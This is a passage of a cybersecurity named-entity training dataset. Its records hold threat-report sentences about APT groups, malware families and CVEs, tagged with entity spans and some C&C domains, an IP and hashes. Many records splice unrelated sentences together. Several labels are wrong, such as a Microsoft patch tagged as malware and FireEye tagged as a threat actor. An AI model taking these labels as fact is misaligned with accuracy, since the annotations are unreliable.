hole attacks . 
In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: group": [[81, 86]], "MALWARE: Ismdoor RAT": [[218, 229]]}, "info": {"id": "cyberner_stix_train_006880", "source": "cyberner_stix_train"}} {"text": "The threat group appears to have developed its own remote access tools that it uses alongside publicly available remote access and post-compromise toolsets .", "spans": {}, "info": {"id": "cyberner_stix_train_006881", "source": "cyberner_stix_train"}} {"text": "It can not act independently and operates strictly in accordance with commands received from the C & C server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . In this campaign , the VMProtected launcher used with ShadowPad , as well as with the PortReuse backdoor and skip-2.0 , was replaced by a simpler one . These types of approaches are not uncommon historically , groups have done things like provide \" security reports \" to compromised organizations to help them \" resolve the issue . \"", "spans": {"THREAT_ACTOR: Tropic Trooper": [[112, 126]], "VULNERABILITY: CVE-2012-0158": [[152, 165]], "TOOL: VMProtected": [[219, 230]], "MALWARE: ShadowPad": [[250, 259]], "MALWARE: PortReuse backdoor": [[282, 300]], "MALWARE: skip-2.0": [[305, 313]]}, "info": {"id": "cyberner_stix_train_006882", "source": "cyberner_stix_train"}} {"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures . 
Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: APT32’s": [[159, 166]], "TOOL: emails": [[227, 233]], "MALWARE: Winnti installer": [[236, 252]]}, "info": {"id": "cyberner_stix_train_006883", "source": "cyberner_stix_train"}} {"text": "They tend to target any antivirus protections on the device and uninstall them , which increases the possibility of their malware persisting on the device . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . The Carbanak attacks targeting over a 100 financial institutions worldwide .", "spans": {"THREAT_ACTOR: attackers": [[161, 170]], "ORGANIZATION: banks": [[256, 261]], "ORGANIZATION: financial institutions": [[306, 328]]}, "info": {"id": "cyberner_stix_train_006884", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 06.2017.docx .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "FILEPATH: 06.2017.docx": [[159, 171]]}, "info": {"id": "cyberner_stix_train_006885", "source": "cyberner_stix_train"}} {"text": "The stage 2 payload was PlugX that beaconed to C&C servers www.icefirebest.com and www.icekkk.net .", "spans": {"MALWARE: PlugX": [[24, 29]], "TOOL: C&C": [[47, 50]], "DOMAIN: www.icefirebest.com": [[59, 78]], "DOMAIN: www.icekkk.net": [[83, 97]]}, "info": {"id": "cyberner_stix_train_006886", "source": "cyberner_stix_train"}} {"text": "The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C & C command . 
Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": {"TOOL: Leader": [[144, 150]], "TOOL: Bookworm": [[154, 162]], "MALWARE: DLLs": [[258, 262]], "VULNERABILITY: CVE-2017-8759": [[325, 338]]}, "info": {"id": "cyberner_stix_train_006887", "source": "cyberner_stix_train"}} {"text": "After that , CosmicDuke and the second malware operate entirely independently of each other , including separately contacting their C&C servers .", "spans": {"MALWARE: CosmicDuke": [[13, 23]], "TOOL: C&C": [[132, 135]]}, "info": {"id": "cyberner_stix_train_006888", "source": "cyberner_stix_train"}} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "THREAT_ACTOR: Turla": [[173, 178]]}, "info": {"id": "cyberner_stix_train_006889", "source": "cyberner_stix_train"}} {"text": "Our security app allows us to transmit this sensitive data encrypted to you , thus increasing the security that you will not suffer any financial loss . These actors perform DNS hijacking through the use of actor-controlled name servers . 
PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics .", "spans": {"THREAT_ACTOR: actors": [[159, 165]], "TOOL: name servers": [[224, 236]], "THREAT_ACTOR: PROMETHIUM": [[239, 249]], "THREAT_ACTOR: NEODYMIUM": [[311, 320]]}, "info": {"id": "cyberner_stix_train_006890", "source": "cyberner_stix_train"}} {"text": "Name svchost.exe Size 1062912 MD5 5e70a5c47c6b59dae7faf0f2d62b28b3 SHA1 cdeea936331fcdd8158c876e9d23539f8976c305 SHA256 730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a Compile Time 2015-04-22 10:49:54 .", "spans": {"FILEPATH: svchost.exe": [[5, 16]], "FILEPATH: 5e70a5c47c6b59dae7faf0f2d62b28b3": [[34, 66]], "FILEPATH: cdeea936331fcdd8158c876e9d23539f8976c305": [[72, 112]], "FILEPATH: 730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a": [[120, 184]]}, "info": {"id": "cyberner_stix_train_006891", "source": "cyberner_stix_train"}} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The campaign is believed to be active covertly since fall 2017 .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]]}, "info": {"id": "cyberner_stix_train_006892", "source": "cyberner_stix_train"}} {"text": "At the forum of the Armbian operating system , a moderator who goes by the name Tkaiser noted that the backdoor code could remotely be exploitable \" if combined with networked services that might allow access to /proc . In 2016 , CTU researchers observed the group using native system . Outlaw : http://www.minpop.com/sk12pack/names.php Command and control . “ Who or what is asdfdfsda@asdf.com ? 
, ” Biderman asked , after being sent a list of nine email addresses .", "spans": {"SYSTEM: Armbian": [[20, 27]], "ORGANIZATION: CTU": [[230, 233]], "THREAT_ACTOR: Outlaw": [[287, 293]], "URL: http://www.minpop.com/sk12pack/names.php": [[296, 336]], "TOOL: Command and control": [[337, 356]], "ORGANIZATION: asdfdfsda@asdf.com": [[376, 394]], "ORGANIZATION: Biderman": [[401, 409]]}, "info": {"id": "cyberner_stix_train_006893", "source": "cyberner_stix_train"}} {"text": "This app , dubbed “ TrickMo ” by our team , is designed to bypass second factor and strong authentication pushed to bank customers when they need to authorize a transaction . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East .", "spans": {"MALWARE: TrickMo": [[20, 27]], "VULNERABILITY: CVE-2017-11882": [[203, 217]], "VULNERABILITY: CVE-2018-0802": [[222, 235]], "TOOL: weaponizer": [[242, 252]], "THREAT_ACTOR: actors": [[301, 307]], "ORGANIZATION: Unit 42": [[485, 492]], "THREAT_ACTOR: OilRig group": [[526, 538]], "ORGANIZATION: government agency": [[569, 586]]}, "info": {"id": "cyberner_stix_train_006894", "source": "cyberner_stix_train"}} {"text": "This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany . WEBC2 backdoors work for their intended purpose , but they generally have fewer features than the “ Standard Backdoors ” described below . 
Attackers frequently abuse stolen certificates to prevent the malware they 're spreading from being detected by various security protections .", "spans": {"ORGANIZATION: banks": [[178, 183], [250, 255]], "TOOL: banking Trojan": [[200, 214]], "MALWARE: WEBC2 backdoors": [[269, 284]], "THREAT_ACTOR: Attackers": [[408, 417]]}, "info": {"id": "cyberner_stix_train_006895", "source": "cyberner_stix_train"}} {"text": "credential harvester , Sasfis .", "spans": {"MALWARE: Sasfis": [[23, 29]]}, "info": {"id": "cyberner_stix_train_006896", "source": "cyberner_stix_train"}} {"text": "] com ws.my-local-weather [ . Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . those in the Palestinian government . If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": {"ORGANIZATION: FireEye": [[85, 92]], "THREAT_ACTOR: TEMP.Veles": [[160, 170]], "TOOL: TRITON": [[218, 224]], "ORGANIZATION: Dragos": [[241, 247]], "THREAT_ACTOR: XENOTIME": [[324, 332]], "ORGANIZATION: Palestinian government": [[348, 370]], "VULNERABILITY: If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions": [[373, 571]]}, "info": {"id": "cyberner_stix_train_006897", "source": "cyberner_stix_train"}} {"text": "HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . 
We have already notified Dropbox about the use of its service for this malware .", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[0, 12]], "THREAT_ACTOR: group": [[50, 55]], "ORGANIZATION: aerospace": [[123, 132]], "ORGANIZATION: energy": [[135, 141]], "ORGANIZATION: financial": [[144, 153]], "ORGANIZATION: government": [[156, 166]], "ORGANIZATION: hospitality": [[169, 180]], "ORGANIZATION: telecommunications business": [[185, 212]], "TOOL: Dropbox": [[250, 257]]}, "info": {"id": "cyberner_stix_train_006898", "source": "cyberner_stix_train"}} {"text": "A mysterious hacker or hackers going by the name \" The Shadow Brokers \" claims to have hacked a group linked to the NSA and dumped a bunch of its hacking tools . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 .", "spans": {"ORGANIZATION: NSA": [[116, 119]], "THREAT_ACTOR: Fxmsp": [[162, 167]]}, "info": {"id": "cyberner_stix_train_006899", "source": "cyberner_stix_train"}} {"text": "From these distribution sites , we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim .", "spans": {"MALWARE: Trojan": [[156, 162]], "MALWARE: Nymaim": [[169, 175]]}, "info": {"id": "cyberner_stix_train_006900", "source": "cyberner_stix_train"}} {"text": "The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . 
From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Microsoft Office products": [[44, 69]], "MALWARE: F-Secure Antivirus": [[182, 200]], "MALWARE: Mofang": [[205, 211]]}, "info": {"id": "cyberner_stix_train_006901", "source": "cyberner_stix_train"}} {"text": "It could be possible that the espionage actors used his public identity as a diversion to mislead and to hide the real identity of the attackers or it is also possible that this individual was hired to carry out the attack .", "spans": {}, "info": {"id": "cyberner_stix_train_006902", "source": "cyberner_stix_train"}} {"text": "The key for each file is generated randomly and stored in the encrypted file with a fixed offset . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Among all these random keys once the word “salamati” was also used, which means “health” in Farsi . It appears the activity by the group may have been stopped early in the attack chain as the only malicious activity seen on infected machines is credential harvesting .", "spans": {"THREAT_ACTOR: APT33": [[129, 134]], "ORGANIZATION: organization": [[162, 174]], "ORGANIZATION: business conglomerate": [[194, 215]], "MALWARE: malicious file": [[224, 238]], "ORGANIZATION: petrochemical company": [[311, 332]], "THREAT_ACTOR: group": [[466, 471]], "SYSTEM: infected machines": [[559, 576]]}, "info": {"id": "cyberner_stix_train_006903", "source": "cyberner_stix_train"}} {"text": "Given the lack of indicators of compromise , we decided to check to see if this was the same malware we had been researching . 
APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots . According to Gartner , ASUS is the world’s 5th-largest PC vendor by 2017 unit sales . Over the last decade , Iran has waged a number of disruptive and destructive cyber campaigns against government entities and companies alike , becoming infamous for its deployment of wiper malware as well as its retaliatory attack strategy .", "spans": {"THREAT_ACTOR: APT10": [[127, 132]], "TOOL: scheduled tasks": [[188, 203]], "TOOL: Windows services": [[207, 223]], "ORGANIZATION: Gartner": [[314, 321]], "ORGANIZATION: ASUS": [[324, 328]], "THREAT_ACTOR: Iran": [[410, 414]], "ORGANIZATION: government entities": [[488, 507]], "ORGANIZATION: companies": [[512, 521]]}, "info": {"id": "cyberner_stix_train_006904", "source": "cyberner_stix_train"}} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . 
makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[189, 197]], "MALWARE: checker1.exe": [[198, 210]], "MALWARE: PsExec": [[295, 301]], "MALWARE: psexec.exe": [[322, 332]], "FILEPATH: makeself.sh": [[335, 346]], "FILEPATH: shell script": [[358, 370]]}, "info": {"id": "cyberner_stix_train_006905", "source": "cyberner_stix_train"}} {"text": "Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"TOOL: emails": [[33, 39]], "TOOL: Winnti installer": [[42, 58]]}, "info": {"id": "cyberner_stix_train_006906", "source": "cyberner_stix_train"}} {"text": "Trend Micro offers security for Android mobile devices through Mobile Security for Android™ to protect against these types of attacks . This isn't the first time we've seen Cobalt makes this error—back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw . the code was written to link the block comparison variable and block address in MMAT_LOCOPT , But as a new documentary series on Hulu reveals [ SPOILER ALERT ! 
] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "SYSTEM: Android": [[32, 39]], "SYSTEM: Mobile Security for Android™": [[63, 91]], "THREAT_ACTOR: Cobalt": [[173, 179]], "ORGANIZATION: financial institutions": [[257, 279]], "TOOL: MMAT_LOCOPT": [[394, 405]], "ORGANIZATION: Hulu": [[443, 447]]}, "info": {"id": "cyberner_stix_train_006907", "source": "cyberner_stix_train"}} {"text": "The keylogger can track three different events ( Figure 5 ) : TYPE_VIEW_CLICKED Represents the event of clicking on a View-like Button , CompoundButton , etc . The latter was one of at least three law firms Butterfly has targeted over the past three years . As with their previous fake company “ Combi Security ” , we are confident that they continue to create new personas for use in either targeting or recruiting under a “ new ” brand , “ IPC ” . In fact , this chain also leads to NetSupport RAT .", "spans": {"ORGANIZATION: law firms": [[197, 206]], "THREAT_ACTOR: Butterfly": [[207, 216]], "ORGANIZATION: Combi Security": [[296, 310]], "ORGANIZATION: IPC": [[442, 445]], "TOOL: NetSupport RAT": [[485, 499]]}, "info": {"id": "cyberner_stix_train_006908", "source": "cyberner_stix_train"}} {"text": "HummingWhale , as the professionally developed malware has been dubbed , is a variant of HummingBad , the name given to a family of malicious apps researchers documented in July invading non-Google app markets . The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality . However , prior to this attempted attack , Symantec had rolled out proactive protection against any attempt to exploit this vulnerability ( Exp.CVE-2018-20250 ) . 
Such non - native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post - intrusion cleanup process .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "MALWARE: HummingBad": [[89, 99]], "TOOL: KiloAlfa": [[226, 234]], "TOOL: keylogging functionality": [[316, 340]], "ORGANIZATION: Symantec": [[386, 394]], "VULNERABILITY: Exp.CVE-2018-20250": [[483, 501]]}, "info": {"id": "cyberner_stix_train_006909", "source": "cyberner_stix_train"}} {"text": "We further assess that APT28 is the group responsible for the network compromises of WADA and the DNC and other entities related to the 2016 U.S. presidential election cycle .", "spans": {"THREAT_ACTOR: APT28": [[23, 28]], "ORGANIZATION: WADA": [[85, 89]], "ORGANIZATION: DNC": [[98, 101]]}, "info": {"id": "cyberner_stix_train_006910", "source": "cyberner_stix_train"}} {"text": "The modern version of Rotexy combines the functions of a banking Trojan and ransomware . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal .", "spans": {"MALWARE: Rotexy": [[22, 28]], "THREAT_ACTOR: REDBALDKNIGHT": [[99, 112]], "MALWARE: decoy documents": [[223, 238]], "MALWARE: RATANKBA": [[300, 308]], "THREAT_ACTOR: Lazarus": [[339, 346]]}, "info": {"id": "cyberner_stix_train_006911", "source": "cyberner_stix_train"}} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . 
Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[121, 172]], "ORGANIZATION: MATI": [[175, 179]], "FILEPATH: Backdoor.Powemuddy": [[215, 233]], "THREAT_ACTOR: Seedworm": [[252, 260]], "FILEPATH: Powermud backdoor": [[264, 281]], "MALWARE: POWERSTATS": [[288, 298]], "VULNERABILITY: exploit": [[425, 432]]}, "info": {"id": "cyberner_stix_train_006912", "source": "cyberner_stix_train"}} {"text": "Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue .", "spans": {"THREAT_ACTOR: Lazarus group": [[24, 37]], "ORGANIZATION: job recruiters": [[108, 122]], "FILEPATH: TajMahal": [[198, 206]]}, "info": {"id": "cyberner_stix_train_006913", "source": "cyberner_stix_train"}} {"text": "After enabling AccessibilityService , the malware sets itself as the default SMS app Now installed and having obtained the necessary permissions from the user , Riltok contacts its C & C server . APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009 . 
The .scr file contains 2 Office documents .", "spans": {"MALWARE: Riltok": [[161, 167]], "THREAT_ACTOR: APT10": [[196, 201]], "THREAT_ACTOR: FireEye": [[242, 249]], "FILEPATH: .scr": [[279, 283]], "TOOL: Office": [[300, 306]]}, "info": {"id": "cyberner_stix_train_006914", "source": "cyberner_stix_train"}} {"text": "During this stage , the loader may also call a certain API using native system calls , which is another way to bypass breakpoints on API and security solutions using hooks . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound . The steganography algorithm appears to be bespoke and utilizes a least significant bit approach to minimize visual differences when compared with the original image to prevent analysis by discovery tools . \" VP Labs RD and Deputy CSO at LogRhythm .", "spans": {"TOOL: Retriever": [[192, 201]], "TOOL: .NET downloader": [[207, 222]], "ORGANIZATION: VP Labs RD and Deputy CSO at LogRhythm": [[508, 546]]}, "info": {"id": "cyberner_stix_train_006915", "source": "cyberner_stix_train"}} {"text": "EVENTBOT VERSION 0.0.0.2 Dynamic Library Loading As of Version 0.0.0.2 , EventBot attempts to hide its main functionality from static analysis . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . 
In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER .", "spans": {"MALWARE: EVENTBOT": [[0, 8]], "MALWARE: EventBot": [[73, 81]], "MALWARE: KHRAT": [[145, 150]], "TOOL: backdoor trojan": [[156, 171]], "THREAT_ACTOR: DragonOK": [[236, 244]], "ORGANIZATION: FireEye": [[262, 269]], "THREAT_ACTOR: APT34": [[279, 284]], "MALWARE: POWRUNER PowerShell-based backdoor": [[340, 374]], "MALWARE: BONDUPDATER": [[394, 405]]}, "info": {"id": "cyberner_stix_train_006916", "source": "cyberner_stix_train"}} {"text": "Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and using an email theme relevant to the targets .", "spans": {"TOOL: email": [[100, 105], [123, 128]]}, "info": {"id": "cyberner_stix_train_006917", "source": "cyberner_stix_train"}} {"text": "As of this writing , all the domains were registered recently and some are already offline . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . 
A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri .", "spans": {"MALWARE: JS dropper": [[136, 146]], "MALWARE: JS decryptor": [[169, 181]], "MALWARE: KopiLuwak": [[261, 270]], "THREAT_ACTOR: Flying Kitten": [[412, 425]], "THREAT_ACTOR: Rocket Kitten": [[429, 442]]}, "info": {"id": "cyberner_stix_train_006918", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 69.87.223.26 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 69.87.223.26": [[11, 23]]}, "info": {"id": "cyberner_stix_train_006919", "source": "cyberner_stix_train"}} {"text": "First , the app creates a JavaScript function to call a Java method , getImageBase64 , exposed to WebView using addJavascriptInterface . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions – South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) . ZxShell employs a strange method for communication : it hooks the NtWriteFile API and recognizes 5 different special handle values as commands : In this blog post , we show how the newly found Kritec skimmer was found along side one of its competitors .", "spans": {"MALWARE: ZxShell": [[334, 341]], "MALWARE: Kritec skimmer": [[527, 541]]}, "info": {"id": "cyberner_stix_train_006920", "source": "cyberner_stix_train"}} {"text": "CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . 
In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2017-0143": [[0, 13]], "MALWARE: tools—EternalRomance": [[49, 69]], "MALWARE: EternalSynergy—that": [[74, 93]], "VULNERABILITY: CVE-2011-3544": [[208, 221]], "MALWARE: HTTPBrowser backdoor": [[289, 309]], "VULNERABILITY: CVE-2010-0738": [[316, 329]], "MALWARE: JBoss": [[351, 356]], "VULNERABILITY: exploit": [[457, 464]]}, "info": {"id": "cyberner_stix_train_006921", "source": "cyberner_stix_train"}} {"text": "In 2018 , versions of Rotexy emerged that contacted the C & C using its IP address . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 .", "spans": {"MALWARE: Rotexy": [[22, 28]], "THREAT_ACTOR: APT32": [[112, 117]], "MALWARE: Microsoft ActiveMime file": [[159, 184]], "MALWARE: WannaCry": [[227, 235]], "MALWARE: WCry": [[252, 256]], "MALWARE: WanaCryptor": [[260, 271]], "MALWARE: ransomware": [[318, 328]], "ORGANIZATION: Microsoft": [[430, 439]], "TOOL: Server Message Block": [[443, 463]], "TOOL: SMB": [[466, 469]]}, "info": {"id": "cyberner_stix_train_006922", "source": "cyberner_stix_train"}} {"text": "This list is expected to grow in the future . 
Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials . The email below was sent from a personal email account with a subject line of “ New Year Wishes on January 1st ” .", "spans": {"THREAT_ACTOR: Insikt Group": [[46, 58]], "MALWARE: Citrix-hosted": [[157, 170]], "TOOL: email": [[352, 357], [389, 394]]}, "info": {"id": "cyberner_stix_train_006923", "source": "cyberner_stix_train"}} {"text": "from the Android device and SIM card setForward — currently not implemented , but can be used to hijack the infected device getForward — currently not implemented , but can be used to hijack the infected device hasPkg — check the device whether a specified app is installed or not setRingerMode — set the device ’ s ringer mode setRecEnable — set the device ’ s ringer mode as silent reqState — get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome — The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . The tool is able to grant remote access and full , direct control of the infected machine to the group .", "spans": {"SYSTEM: Android": [[9, 16]], "THREAT_ACTOR: group": [[523, 528]]}, "info": {"id": "cyberner_stix_train_006924", "source": "cyberner_stix_train"}} {"text": "In the course of further research , we found a number of related samples that point to a long-term development process . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . 
Charming Kitten usually tries to access private email and Facebook accounts , and sometimes establishes a foothold on victim computers as a secondary objective .", "spans": {"THREAT_ACTOR: MuddyWater": [[121, 131]], "THREAT_ACTOR: Charming Kitten": [[251, 266]], "TOOL: email": [[299, 304]], "ORGANIZATION: Facebook": [[309, 317]]}, "info": {"id": "cyberner_stix_train_006925", "source": "cyberner_stix_train"}} {"text": "However , because of the length of time for which the group has been distributing Dridex , distribution mechanisms trace the state of the art for the last two years of email campaigns with techniques ranging from straight macro documents to a variety of zipped scripts .", "spans": {"MALWARE: Dridex": [[82, 88]], "TOOL: email": [[168, 173]], "TOOL: macro": [[222, 227]], "TOOL: zipped": [[254, 260]]}, "info": {"id": "cyberner_stix_train_006926", "source": "cyberner_stix_train"}} {"text": "Although they may have started much earlier , the earliest BlackEnergy sample we could attribute to the Quedagh gang is from December 14 , 2010 . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"TOOL: BlackEnergy sample": [[59, 77]], "THREAT_ACTOR: Quedagh gang": [[104, 116]], "THREAT_ACTOR: APT28": [[146, 151]], "ORGANIZATION: rockers": [[168, 175]], "ORGANIZATION: dissidents Pussy Riot": [[180, 201]], "TOOL: emails": [[221, 227]]}, "info": {"id": "cyberner_stix_train_006927", "source": "cyberner_stix_train"}} {"text": "The Quasar serve does not verify the RAT data , and displays this data in the RAT Server GUI when the RAT is executed and connects to the server .", "spans": {"MALWARE: Quasar": [[4, 10]], "TOOL: RAT": [[37, 40], [78, 81], [102, 105]]}, "info": {"id": "cyberner_stix_train_006928", "source": "cyberner_stix_train"}} {"text": "Based on this information , Talos assesses with high confidence that the malware is the same and this is , in fact , the Gustuff malware . 
We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves . We believe this to be a very sophisticated supply chain attack , which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"ORGANIZATION: Talos": [[28, 33]], "MALWARE: Gustuff": [[121, 128]], "TOOL: Quasar malware": [[202, 216]], "TOOL: ChChes": [[272, 278]], "TOOL: RedLeaves": [[283, 292]], "THREAT_ACTOR: Monti": [[498, 503]], "ORGANIZATION: Linux platform": [[519, 533]]}, "info": {"id": "cyberner_stix_train_006929", "source": "cyberner_stix_train"}} {"text": "To ensure you are fully protected against PHAs and other threats , we recommend these 5 basic steps : Install apps only from reputable sources : Install apps from a reputable source , such as Google Play . RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East . This may suggest that the malefactor changed a build configuration rather than the source code itself . Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": {"SYSTEM: Google Play": [[192, 203]], "THREAT_ACTOR: RASPITE": [[206, 213]], "ORGANIZATION: Symantec": [[242, 250]], "THREAT_ACTOR: Leafminer": [[254, 263]], "THREAT_ACTOR: group": [[306, 311]], "SYSTEM: Cisco Secure Web Appliance": [[449, 475]], "SYSTEM: Web Security Appliance": [[487, 509]]}, "info": {"id": "cyberner_stix_train_006930", "source": "cyberner_stix_train"}} {"text": "DYNAMIC LIBRARY LOADING Once the application has finished the installation process , the malware starts its real malicious activity . 
We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks .", "spans": {"TOOL: China Chopper webshell": [[152, 174]], "THREAT_ACTOR: Emissary Panda": [[235, 249]], "THREAT_ACTOR: Gorgon Group": [[265, 277]]}, "info": {"id": "cyberner_stix_train_006931", "source": "cyberner_stix_train"}} {"text": "TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR . The macros popped the same “ Document decryption error ” error message—even if macro code remain totally different . Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": {"ORGANIZATION: bank": [[135, 139]], "TOOL: macros": [[182, 188]], "TOOL: macro": [[257, 262]]}, "info": {"id": "cyberner_stix_train_006932", "source": "cyberner_stix_train"}} {"text": "In this way , when the service runs during boot , the original Windows executable is executed from a different location and it will automatically load and map the malicious DLL inside its address space , instead of using the genuine system library . By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives . Known to load an updated version of Remy backdoor . 